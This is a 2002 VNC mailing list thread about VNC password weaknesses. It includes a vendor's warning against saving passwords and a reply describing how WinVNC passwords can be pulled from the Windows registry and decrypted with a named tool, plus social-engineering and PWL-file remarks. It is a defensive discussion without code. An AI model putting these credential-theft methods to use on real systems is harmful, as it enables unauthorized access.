VNC is "hackable"
Thu Aug 29 19:57:00 2002
Also, be weary about saving your passwords in config files. This has been a common topic among our VNCScan users. Network Administrators have found their co-workers saving them to hard drives that where not protected very well. No need to sniff if you can pull them from a network share. Also, a couple other VNC management tools save your password in a database or file. If you use those apps, I strongly advise against using that feature. Sure, it's convenient to avoid typing in the password each time, but consider the inherent security risks with saving them there.
By the way, we're almost done with the .NET version of VNCScan. This version is going to open a lot of new doors for "wow" features. Stay tuned to http://www.vncscan.com for news as it arrives.
From: Richard Harris [mailto:firstname.lastname@example.org]
Sent: Thursday, August 29, 2002 8:18 AM
Subject: Re: VNC is "hackable"
> Am I wrong?
> Wouldn't they have to sniff packets and decrypt to get the password?
> suppose it can be done, but I don't know that anyone is doing it.
I don't know about packet sniffing, but the password can be comprised. You
can read the WinVNC password from the registry and there is a "vncdec.c"
program that will decrypt the password for you.
There's no registry security on 95/98 - so how hard would it be for a hacker to
access it? <shrug>. NT/2000 are better, but we all know that those systems
can and are hacked.
What's the deal with programs like zVNC. They use a different connection
mechanism, so am I write in saying that the connection is secure, but the
registry loophole remains.
The question is: can packets be sniffed and this encrypted password be broken
with the same registry key code cracker? Any volunteers?
IMO, one solution would be some sort of SSH (or local VPN?) connection to
the VNC host and then connect via loopback. Easy enough on unix, but not so
easy on Windows. I guess this would a pefect use for a modular VNC distro. :-)
But then if you want to hack someones system, I'd say you'd go for the weakest
systems first. Try your hand at comprimising the local box first. Trawl the
registry for saved passwords, or even old PWL files....... Failing that, just ring
up and ask a user..... it's surprising how many people will just tell you their
password over the phone.
"Service, price , quality: pick any two."
VNC-List mailing list